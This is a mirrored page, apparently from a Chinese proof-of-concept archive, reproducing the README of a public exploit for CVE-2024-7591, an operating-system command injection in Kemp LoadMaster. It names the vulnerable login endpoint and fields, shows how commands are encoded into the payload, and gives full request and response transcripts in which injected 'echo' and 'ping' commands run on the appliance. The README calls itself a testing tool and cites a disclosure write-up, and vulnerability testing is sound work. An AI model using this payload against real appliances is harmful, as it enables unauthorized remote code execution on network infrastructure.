支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 0d37162bb39f3819784459274d740330b21b551f

来源
https://github.com/butyraldehyde/CVE-2024-7591-PoC
关联漏洞
标题:Kemp LoadMaster 安全漏洞 (CVE-2024-7591)
Description:Kemp LoadMaster是Kemp公司的一款高度安全的应用程序。 Kemp LoadMaster 7.2.60.0及之前版本存在安全漏洞,该漏洞源于不正确的输入验证,允许操作系统命令注入。
Description
These PoC python scripts test the Kemp LoadMaster for remote code execution.
介绍
# CVE-2024-7591-PoC
These PoC python scripts test the Kemp LoadMaster for remote code execution.

THIS TOOL IS INTENDED FOR TESTING PURPOSES ONLY

These scripts were based on Marius Walter's writeup on the specifics of this exploit. You can read their post at:
https://insinuator.net/2024/11/vulnerability-disclosure-command-injection-in-kemp-loadmaster-load-balancer-cve-2024-7591/

This is a python3 script meant for testing a LoadMaster against CVE-2024-7591.


USAGE:

KempRCECommandGenerator.py is meant to take a bash command and convert it in to an encoded form that can be used to run
remote commands against a vulnerable LoadMaster. The output of this code is meant to be used in conjunction with Burp
Suite or some other tool to send remote commands to the server.

Example:
```
$: python3 ./KempRCECommandGenerator.py
Enter your command: echo hello
Put this output in the token, token2, user, or pass field
in the POST request to /progs/status/login.

%01%78%27%3b%65%63%68%6f%20%68%65%6c%6c%6f%3b%65%63%68%6f%20%27%01

$: 
```
Your command output should be present in the response after the HTTP headers and before the html code.




KempExploit.py is meant to be an independent use python script for testing if the vulnerability is exploitable or running
custom code.

PREREQUISITES:

requests

urllib3

bs4

textwrap



Example:
```
$: python3 ./KempExploit.py -u 10.0.1.50 --verbose --secure
Enter your command to send or leave blank to test: 
It looks like I found a target and some tokens. Do you want to proceed? [y/N]y

---------------- request ----------------
POST https://10.0.1.50:443/progs/status/login
User-Agent: python-requests/2.32.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 196

token=d8a7863c4a3b59a56b42403cf9100435&token2=b1e63802eb144a814c00ffa8c870d3c6&logsub=Login&user=pwn&pass=%01%78%78%78%27%3b%65%63%68%6f%20%65%78%70%6c%6f%69%74%61%62%6c%65%3b%65%63%68%6f%20%27%01
---------------- response ----------------
200 OK https://10.0.1.50:443/progs/status/login
Date: Tue, 12 Aug 2025 00:55:32 GMT
Connection: Keep-Alive
Content-Type: text/html
Transfer-Encoding: chunked

exploitable

X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Connection: close
Cache-Control: no-cache, max-age=0, must-revalidate, no-store

<!DOCTYPE html>
<html>
<head>
<script>
alert("Login Failed");
</script>
<script>
if(parent && parent != window){
parent.location = "/";
parent.location.reload(true);
}
</script>
</head>
</html>


Login POST status code: 200
✅ 'exploitable' found in response, server confirmed vulnerable.
$:
```

Example 2:
```
$: python3 ./KempExploit.py -u 10.0.1.50 --secure --verbose
Enter your command to send or leave blank to test: ping -c2 10.0.1.16
It looks like I found a target and some tokens. Do you want to proceed? [y/N]y
Running the command ping -c2 10.0.1.16
The encoded command looks like: %01%78%27%3b%70%69%6e%67%20%2d%63%32%20%31%30%2e%30%2e%31%2e%31%36%3b%65%63%68%6f%20%27%01

---------------- request ----------------
POST https://10.0.1.50:443/progs/status/login
User-Agent: python-requests/2.32.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 196

token=a236deda9bb1d4930a331e92caf269ad&token2=a5a5587fd8babd690851f32a85faabb8&logsub=Login&user=pwn&pass=%01%78%27%3b%70%69%6e%67%20%2d%63%32%20%31%30%2e%30%2e%31%2e%31%36%3b%65%63%68%6f%20%27%01
---------------- response ----------------
200 OK https://10.0.1.50:443/progs/status/login
Date: Tue, 12 Aug 2025 00:59:08 GMT
Connection: Keep-Alive
Content-Type: text/html
Transfer-Encoding: chunked

PING 10.0.1.16 (10.0.1.16) 56(84) bytes of data.
64 bytes from 10.0.1.16: icmp_seq=1 ttl=63 time=6.71 ms
64 bytes from 10.0.1.16: icmp_seq=2 ttl=63 time=5.34 ms

--- 10.0.1.16 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 5.349/6.030/6.712/0.685 ms

X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Connection: close
Cache-Control: no-cache, max-age=0, must-revalidate, no-store

<!DOCTYPE html>
<html>
<head>
<script>
alert("Login Failed");
</script>
<script>
if(parent && parent != window){
parent.location = "/";
parent.location.reload(true);
}
</script>
</head>
</html>


Login POST status code: 200
Command sent successfully.
$: 
```
文件快照

 [4.0K]  /data/pocs/0d37162bb39f3819784459274d740330b21b551f
├── [5.2K]  KempExploit.py
├── [1.4K]  KempRCECommandGenerator.py
├── [ 11K]  LICENSE
└── [4.4K]  README.md

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。